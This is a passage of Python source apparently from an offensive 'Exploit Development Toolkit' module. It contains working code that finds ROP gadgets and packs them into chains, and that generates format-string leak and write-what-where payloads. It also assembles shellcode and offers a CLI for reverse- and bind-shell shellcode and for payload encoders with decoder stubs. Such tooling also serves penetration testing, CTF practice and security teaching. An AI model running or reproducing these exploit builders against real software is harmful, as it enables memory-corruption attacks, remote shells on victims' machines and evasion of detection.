gadget_str = ' ; '.join(chain[start_idx:])
gtype = self._classify_gadget(gadget_str)
if gadget_type and gtype != gadget_type:
continue
# Get the address of the first instruction
lookback = lines[max(0, i - 5) + start_idx].strip()
am = re.match(r'\s*([0-9a-fA-F]+):', lookback)
gaddr = f'0x{am.group(1)}' if am else f'0x{addr}'
gadgets.append({
'address': gaddr,
'gadget': gadget_str,
'type': gtype,
})
if len(gadgets) >= max_gadgets:
break
if len(gadgets) >= max_gadgets:
break
if len(gadgets) >= max_gadgets:
break
# Deduplicate
seen = set()
unique = []
for g in gadgets:
key = g['address'] + g['gadget']
if key not in seen:
seen.add(key)
unique.append(g)
return {
'binary': binary_path,
'tool': 'objdump',
'count': len(unique),
'gadgets': unique,
}
def _classify_gadget(self, gadget_str):
"""Classify a gadget by its instruction pattern."""
g = gadget_str.lower()
if re.search(r'pop\s+\w+.*ret', g):
return 'pop_ret'
if 'xchg' in g:
return 'xchg'
if 'syscall' in g or 'int 0x80' in g:
return 'syscall'
if re.search(r'jmp\s+(esp|rsp)', g):
return 'jmp_esp'
if re.search(r'call\s+(eax|ebx|ecx|edx|esi|edi|rax|rbx|rcx|rdx|rsi|rdi|r\d+)', g):
return 'call_reg'
if 'mov' in g:
return 'mov'
if 'ret' in g:
return 'ret'
return 'other'
# -----------------------------------------------------------------------
# ROP Chain Builder
# -----------------------------------------------------------------------
def build_rop_chain(self, gadgets, chain_spec):
"""Assemble a ROP chain from gadgets and a chain specification.
Args:
gadgets: list of gadget dicts (address, gadget, type)
chain_spec: list of dicts describing desired chain:
[
{'gadget_type': 'pop_ret', 'register': 'rdi', 'value': '0x...'},
{'gadget_type': 'pop_ret', 'register': 'rsi', 'value': '0x...'},
{'gadget_type': 'syscall'},
...
]
Returns:
dict with chain bytes, addresses, and debug info
"""
if not gadgets:
return {'error': 'No gadgets provided'}
if not chain_spec:
return {'error': 'No chain specification provided'}
# Index gadgets by type
by_type = {}
for g in gadgets:
gtype = g.get('type', 'other')
by_type.setdefault(gtype, []).append(g)
chain_addrs = []
chain_bytes = b''
debug_lines = []
for step in chain_spec:
gtype = step.get('gadget_type', step.get('type', 'pop_ret'))
register = step.get('register', '').lower()
value = step.get('value', '0')
# Find matching gadget
candidates = by_type.get(gtype, [])
if register:
# Filter by register in gadget text
reg_candidates = [g for g in candidates if register in g['gadget'].lower()]
if reg_candidates:
candidates = reg_candidates
if not candidates:
debug_lines.append(f'[!] No gadget found for: {gtype} {register}')
continue
gadget = candidates[0] # Use first match
addr_int = int(gadget['address'], 16)
# Determine address width (4 or 8 bytes)
if addr_int > 0xFFFFFFFF:
addr_bytes = struct.pack('<Q', addr_int)
else:
addr_bytes = struct.pack('<I', addr_int)
chain_bytes += addr_bytes
chain_addrs.append(gadget['address'])
debug_lines.append(f'[+] {gadget["address"]}: {gadget["gadget"]}')
# If pop_ret, add the value to be popped
if gtype == 'pop_ret' and 'value' in step:
val_int = int(value, 0) if isinstance(value, str) else int(value)
if addr_int > 0xFFFFFFFF:
chain_bytes += struct.pack('<Q', val_int & 0xFFFFFFFFFFFFFFFF)
else:
chain_bytes += struct.pack('<I', val_int & 0xFFFFFFFF)
debug_lines.append(f' => 0x{val_int:x}')
return {
'chain_hex': chain_bytes.hex(),
'chain_length': len(chain_bytes),
'addresses': chain_addrs,
'steps': len(chain_spec),
'matched': len(chain_addrs),
'debug': '\n'.join(debug_lines),
'python': self._chain_to_python(chain_bytes),
}
def _chain_to_python(self, chain_bytes):
"""Convert chain bytes to Python struct.pack() calls."""
lines = ['from struct import pack', '', 'chain = b""']
width = 8 if len(chain_bytes) > 4 and len(chain_bytes) % 8 == 0 else 4
fmt = '<Q' if width == 8 else '<I'
for i in range(0, len(chain_bytes), width):
chunk = chain_bytes[i:i + width]
if len(chunk) == width:
val = struct.unpack(fmt, chunk)[0]
lines.append(f'chain += pack("{fmt}", 0x{val:x})')
return '\n'.join(lines)
# -----------------------------------------------------------------------
# Format String Exploitation
# -----------------------------------------------------------------------
def format_string_offset(self, binary_path=None, test_count=20):
"""Generate format string test payloads for offset discovery.
Args:
binary_path: optional binary path (unused, for UI consistency)
test_count: number of %p/%x probes to generate
Returns:
dict with test payloads for each format specifier
"""
test_count = min(int(test_count), 100)
payloads = {
'pointer_leak': {
'payload': '.'.join(f'%{i}$p' for i in range(1, test_count + 1)),
'description': 'Leak stack pointers at each offset',
},
'hex_leak': {
'payload': '.'.join(f'%{i}$x' for i in range(1, test_count + 1)),
'description': 'Leak stack values as hex (32-bit)',
},
'long_hex_leak': {
'payload': '.'.join(f'%{i}$lx' for i in range(1, test_count + 1)),
'description': 'Leak stack values as long hex (64-bit)',
},
'string_probe': {
'payload': '|'.join(f'%{i}$s' for i in range(1, min(test_count, 10) + 1)),
'description': 'Attempt to read strings (may crash — use with caution)',
},
'marker_test': {
'payload': 'AAAA' + '.'.join(f'%{i}$x' for i in range(1, test_count + 1)),
'description': 'Find AAAA (0x41414141) marker on stack to determine input offset',
},
}
return {
'payloads': payloads,
'test_count': test_count,
'note': 'Feed each payload to the vulnerable printf-like function. '
'The offset where your marker appears is your format string offset.',
}
def format_string_write(self, address, value, offset):
"""Generate a write-what-where format string payload.
Args:
address: target address to write to (hex string or int)
value: value to write (hex string or int)
offset: format string offset where input appears on stack
Returns:
dict with 32-bit and 64-bit payloads
"""
if isinstance(address, str):
address = int(address, 0)
if isinstance(value, str):
value = int(value, 0)
offset = int(offset)
results = {}
# 32-bit write (write 4 bytes as two %hn writes)
low_word = value & 0xFFFF
high_word = (value >> 16) & 0xFFFF
addr_low = struct.pack('<I', address)
addr_high = struct.pack('<I', address + 2)
# Sort writes by value to minimise padding
writes = sorted([
(low_word, addr_low, offset),
(high_word, addr_high, offset + 1),
], key=lambda x: x[0])
payload_parts_32 = []
current = 0
for val, addr, off in writes:
pad = (val - current) % 0x10000
if pad > 0:
payload_parts_32.append(f'%{pad}c')
payload_parts_32.append(f'%{off}$hn')
current = val
payload_32 = addr_low.hex() + addr_high.hex() + ''.join(payload_parts_32)
results['payload_32bit'] = {
'payload': payload_32,
'description': f'Write 0x{value:08x} to 0x{address:08x} (32-bit, two %hn writes)',
'addresses': f'0x{address:08x}, 0x{address + 2:08x}',
}
# 64-bit write (write 8 bytes as four %hn writes)
words_64 = []
for i in range(4):
word = (value >> (i * 16)) & 0xFFFF
addr_part = struct.pack('<Q', address + i * 2)
words_64.append((word, addr_part, offset + i))
words_64.sort(key=lambda x: x[0])
payload_parts_64 = []
current = 0
for val, addr, off in words_64:
pad = (val - current) % 0x10000
if pad > 0:
payload_parts_64.append(f'%{pad}c')
payload_parts_64.append(f'%{off}$hn')
current = val
addrs_hex = ''.join(w[1].hex() for w in words_64)
payload_64 = addrs_hex + ''.join(payload_parts_64)
results['payload_64bit'] = {
'payload': payload_64,
'description': f'Write 0x{value:016x} to 0x{address:016x} (64-bit, four %hn writes)',
}
return results
# -----------------------------------------------------------------------
# Assembly / Disassembly
# -----------------------------------------------------------------------
def assemble(self, code, arch='x64'):
"""Assemble assembly code to machine code bytes.
Args:
code: assembly source (NASM syntax)
arch: x86, x64, arm
Returns:
dict with hex bytes, raw length, and disassembly
"""
if not code or not code.strip():
return {'error': 'No assembly code provided'}
arch = arch.lower().strip()
nasm = find_tool('nasm')
objcopy = find_tool('objcopy')
if nasm and objcopy:
return self._assemble_nasm(code, arch, nasm, objcopy)
# Try keystone-engine
try:
import keystone
return self._assemble_keystone(code, arch)
except ImportError:
pass
return {
'error': 'No assembler available. Install nasm + objcopy, or pip install keystone-engine.'
}
def _assemble_nasm(self, code, arch, nasm_path, objcopy_path):
"""Assemble using NASM."""
# Set BITS directive based on arch
bits_map = {'x86': '32', 'x64': '64', 'i386': '32', 'amd64': '64'}
bits = bits_map.get(arch, '64')
# Prepend BITS directive if not already present
if 'bits' not in code.lower():
code = f'BITS {bits}\n{code}'
with tempfile.NamedTemporaryFile(suffix='.asm', mode='w', delete=False) as f:
f.write(code)
asm_path = f.name
obj_path = asm_path.replace('.asm', '.o')
bin_path = asm_path.replace('.asm', '.bin')
try:
# Assemble
result = subprocess.run(
[nasm_path, '-f', 'bin', '-o', bin_path, asm_path],
capture_output=True, text=True, timeout=10
)
if result.returncode != 0:
return {'error': f'NASM error: {result.stderr.strip()}'}
# Read binary output
with open(bin_path, 'rb') as bf:
machine_code = bf.read()
return {
'hex': machine_code.hex(),
'bytes': list(machine_code),
'length': len(machine_code),
'arch': arch,
'c_array': ', '.join(f'0x{b:02x}' for b in machine_code),
'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"',
}
except subprocess.TimeoutExpired:
return {'error': 'Assembly timed out'}
finally:
for p in (asm_path, obj_path, bin_path):
try:
os.unlink(p)
except OSError:
pass
def _assemble_keystone(self, code, arch):
"""Assemble using keystone-engine."""
import keystone
arch_map = {
'x86': (keystone.KS_ARCH_X86, keystone.KS_MODE_32),
'x64': (keystone.KS_ARCH_X86, keystone.KS_MODE_64),
'arm': (keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM),
}
ks_arch, ks_mode = arch_map.get(arch, (keystone.KS_ARCH_X86, keystone.KS_MODE_64))
try:
ks = keystone.Ks(ks_arch, ks_mode)
encoding, count = ks.asm(code)
machine_code = bytes(encoding)
return {
'hex': machine_code.hex(),
'bytes': list(machine_code),
'length': len(machine_code),
'arch': arch,
'instructions': count,
'c_array': ', '.join(f'0x{b:02x}' for b in machine_code),
'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"',
}
except keystone.KsError as e:
return {'error': f'Keystone error: {e}'}
def disassemble(self, data, arch='x64', offset=0):
"""Disassemble machine code bytes to assembly.
Args:
data: hex string or bytes
arch: x86, x64, arm
offset: base address offset
Returns:
dict with disassembly listing
"""
if isinstance(data, str):
data = data.strip().replace(' ', '').replace('\\x', '')
try:
data = bytes.fromhex(data)
except ValueError:
return {'error': 'Invalid hex data'}
if not data:
return {'error': 'No data to disassemble'}
arch = arch.lower().strip()
offset = int(offset)
# Try capstone first
try:
import capstone
return self._disasm_capstone(data, arch, offset)
except ImportError:
pass
# Fallback to objdump
objdump = find_tool('objdump')
if objdump:
return self._disasm_objdump(data, arch, offset)
# Last resort: manual byte-by-byte display
return self._disasm_basic(data, arch, offset)
def _disasm_capstone(self, data, arch, offset):
"""Disassemble using capstone."""
import capstone
arch_map = {
'x86': (capstone.CS_ARCH_X86, capstone.CS_MODE_32),
'x64': (capstone.CS_ARCH_X86, capstone.CS_MODE_64),
'arm': (capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM),
}
cs_arch, cs_mode = arch_map.get(arch, (capstone.CS_ARCH_X86, capstone.CS_MODE_64))
md = capstone.Cs(cs_arch, cs_mode)
md.detail = False
instructions = []
for addr, size, mnemonic, op_str in md.disasm_lite(data, offset):
instr_bytes = data[addr - offset:addr - offset + size]
instructions.append({
'address': f'0x{addr:08x}',
'bytes': instr_bytes.hex(),
'mnemonic': mnemonic,
'operands': op_str,
'text': f'{mnemonic} {op_str}'.strip(),
})
listing = '\n'.join(
f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}'
for i in instructions
)
return {
'instructions': instructions,
'listing': listing,
'count': len(instructions),
'arch': arch,
'tool': 'capstone',
'data_length': len(data),
}
def _disasm_objdump(self, data, arch, offset):
"""Disassemble using objdump."""
objdump = find_tool('objdump')
with tempfile.NamedTemporaryFile(suffix='.bin', delete=False) as f:
f.write(data)
bin_path = f.name
arch_map = {'x86': 'i386', 'x64': 'i386:x86-64', 'arm': 'arm'}
obj_arch = arch_map.get(arch, 'i386:x86-64')
try:
result = subprocess.run(
[objdump, '-D', '-b', 'binary', '-m', obj_arch,
'-M', 'intel', '--adjust-vma', str(offset), bin_path],
capture_output=True, text=True, timeout=10
)
lines = result.stdout.strip().split('\n')
instructions = []
for line in lines:
match = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', line)
if match:
addr = match.group(1)
raw_bytes = match.group(2).strip()
instr = match.group(3).strip()
instructions.append({
'address': f'0x{addr}',
'bytes': raw_bytes.replace(' ', ''),
'text': instr,
})
listing = '\n'.join(
f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}'
for i in instructions
)
return {
'instructions': instructions,
'listing': listing,
'count': len(instructions),
'arch': arch,
'tool': 'objdump',
'data_length': len(data),
}
except subprocess.TimeoutExpired:
return {'error': 'Disassembly timed out'}
finally:
try:
os.unlink(bin_path)
except OSError:
pass
def _disasm_basic(self, data, arch, offset):
"""Basic hex dump when no disassembler is available."""
listing_lines = []
for i in range(0, len(data), 16):
chunk = data[i:i + 16]
addr = offset + i
hex_part = ' '.join(f'{b:02x}' for b in chunk)
ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
listing_lines.append(f'0x{addr:08x}: {hex_part:<48s} {ascii_part}')
return {
'instructions': [],
'listing': '\n'.join(listing_lines),
'count': 0,
'arch': arch,
'tool': 'hex_dump (no disassembler available)',
'data_length': len(data),
'note': 'Install capstone or objdump for proper disassembly.',
}
# -----------------------------------------------------------------------
# Hex Dump
# -----------------------------------------------------------------------
def hex_dump(self, data, offset=0):
"""Format bytes as a hex dump with ASCII sidebar.
Args:
data: bytes or hex string
offset: starting address offset
Returns:
dict with formatted hex dump string
"""
if isinstance(data, str):
data = bytes.fromhex(data.replace(' ', '').replace('\\x', ''))
lines = []
for i in range(0, len(data), 16):
chunk = data[i:i + 16]
addr = offset + i
hex_part = ' '.join(f'{b:02x}' for b in chunk)
# Pad short lines
hex_part = f'{hex_part:<48s}'
ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
lines.append(f'{addr:08x} {hex_part} |{ascii_part}|')
return {
'dump': '\n'.join(lines),
'length': len(data),
'offset': offset,
}
# -----------------------------------------------------------------------
# CLI interface
# -----------------------------------------------------------------------
def run():
"""CLI menu for exploit development toolkit."""
dev = get_exploit_dev()
while True:
clear_screen()
display_banner()
print(f"\n{Colors.RED}{Colors.BOLD} Exploit Development Toolkit{Colors.RESET}")
print(f"{Colors.DIM} Shellcode, encoders, ROP chains, patterns{Colors.RESET}")
print(f"\n{Colors.CYAN} 1{Colors.RESET} Shellcode Generator")
print(f"{Colors.CYAN} 2{Colors.RESET} Payload Encoder")
print(f"{Colors.CYAN} 3{Colors.RESET} Pattern Create")
print(f"{Colors.CYAN} 4{Colors.RESET} Pattern Offset")
print(f"{Colors.CYAN} 5{Colors.RESET} ROP Gadgets")
print(f"{Colors.CYAN} 6{Colors.RESET} Disassemble")
print(f"{Colors.CYAN} 0{Colors.RESET} Back")
choice = input(f"\n{Colors.WHITE} [{Colors.RED}exploit-dev{Colors.WHITE}]> {Colors.RESET}").strip()
if choice == '0':
break
elif choice == '1':
_cli_shellcode(dev)
elif choice == '2':
_cli_encoder(dev)
elif choice == '3':
_cli_pattern_create(dev)
elif choice == '4':
_cli_pattern_offset(dev)
elif choice == '5':
_cli_rop_gadgets(dev)
elif choice == '6':
_cli_disassemble(dev)
def _cli_shellcode(dev):
"""CLI: Shellcode generator."""
print(f"\n{Colors.BOLD}Available shellcode templates:{Colors.RESET}")
for sc in dev.list_shellcodes():
print(f" {Colors.CYAN}{sc['name']}{Colors.RESET}{sc['description']} ({sc['length']} bytes)")
shell_type = input(f"\n{Colors.WHITE}Shell type (reverse_shell/bind_shell/execve): {Colors.RESET}").strip() or 'execve'
arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip() or 'x64'
platform = input(f"{Colors.WHITE}Platform (linux/windows): {Colors.RESET}").strip() or 'linux'
host = input(f"{Colors.WHITE}Host IP (for reverse/bind, or skip): {Colors.RESET}").strip()
port = input(f"{Colors.WHITE}Port (for reverse/bind, or skip): {Colors.RESET}").strip()
fmt = input(f"{Colors.WHITE}Output format (hex/c_array/python/nasm): {Colors.RESET}").strip() or 'hex'
result = dev.generate_shellcode(shell_type, arch, host or None, port or None, platform, output_format=fmt)
if 'error' in result:
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
else:
print(f"\n{Colors.GREEN}[+] Generated {result['length']} bytes ({result['template']}){Colors.RESET}")
print(f"{Colors.DIM}{result['description']}{Colors.RESET}")
print(f"\n{result['shellcode']}")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_encoder(dev):
"""CLI: Payload encoder."""
sc_hex = input(f"\n{Colors.WHITE}Shellcode (hex): {Colors.RESET}").strip()
if not sc_hex:
return
encoder = input(f"{Colors.WHITE}Encoder (xor/aes/alphanumeric/polymorphic): {Colors.RESET}").strip() or 'xor'
key = input(f"{Colors.WHITE}Key (hex/string, or blank for random): {Colors.RESET}").strip() or None
iters = input(f"{Colors.WHITE}Iterations (default 1): {Colors.RESET}").strip() or '1'
result = dev.encode_payload(sc_hex, encoder, key, int(iters))
if 'error' in result:
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
else:
print(f"\n{Colors.GREEN}[+] Encoded: {result['original_length']} -> {result['encoded_length']} bytes ({result['size_increase']}){Colors.RESET}")
print(f"Key: {result['key']}")
print(f"Null-free: {result['null_free']}")
print(f"\n{Colors.CYAN}Decoder Stub:{Colors.RESET}\n{result['decoder_stub']}")
print(f"\n{Colors.CYAN}Encoded payload (hex):{Colors.RESET}\n{result['encoded']}")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_pattern_create(dev):
"""CLI: Pattern create."""
length = input(f"\n{Colors.WHITE}Pattern length: {Colors.RESET}").strip()
if not length:
return
result = dev.generate_pattern(int(length))
if 'error' in result:
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
else:
print(f"\n{Colors.GREEN}[+] Pattern ({result['length']} bytes):{Colors.RESET}")
print(result['pattern'])
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_pattern_offset(dev):
"""CLI: Pattern offset finder."""
value = input(f"\n{Colors.WHITE}Value to find (hex/int/string): {Colors.RESET}").strip()
if not value:
return
length = input(f"{Colors.WHITE}Pattern length (default 20000): {Colors.RESET}").strip() or '20000'
result = dev.find_pattern_offset(value, int(length))
if result.get('offset', -1) >= 0:
print(f"\n{Colors.GREEN}[+] Found at offset: {result['offset']}{Colors.RESET}")
print(f" Matched: {result['matched']} ({result['endian']})")
else:
print(f"\n{Colors.RED}{result.get('error', 'Not found')}{Colors.RESET}")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_rop_gadgets(dev):
"""CLI: ROP gadget finder."""
binary = input(f"\n{Colors.WHITE}Binary path: {Colors.RESET}").strip()
if not binary:
return
gtype = input(f"{Colors.WHITE}Gadget type (all/pop_ret/xchg/mov/syscall/jmp_esp/call_reg): {Colors.RESET}").strip()
if gtype in ('', 'all'):
gtype = None
result = dev.find_rop_gadgets(binary, gtype)
if 'error' in result:
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
else:
print(f"\n{Colors.GREEN}[+] Found {result['count']} gadgets (via {result['tool']}){Colors.RESET}\n")
for g in result['gadgets'][:50]:
print(f" {Colors.CYAN}{g['address']}{Colors.RESET}: {g['gadget']} [{g['type']}]")
if result['count'] > 50:
print(f"\n ... and {result['count'] - 50} more")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def _cli_disassemble(dev):
"""CLI: Disassemble hex bytes."""
hex_data = input(f"\n{Colors.WHITE}Hex bytes: {Colors.RESET}").strip()
if not hex_data:
return
arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip() or 'x64'
result = dev.disassemble(hex_data, arch)
if 'error' in result:
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
else:
print(f"\n{Colors.GREEN}[+] {result['count']} instructions (via {result['tool']}){Colors.RESET}\n")
print(result['listing'])
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
# ---------------------------------------------------------------------------
# Singleton
# ---------------------------------------------------------------------------
_instance = None
def get_exploit_dev() -> ExploitDev:
"""Get singleton ExploitDev instance."""
global _instance
if _instance is None:
_instance = ExploitDev()
return _instance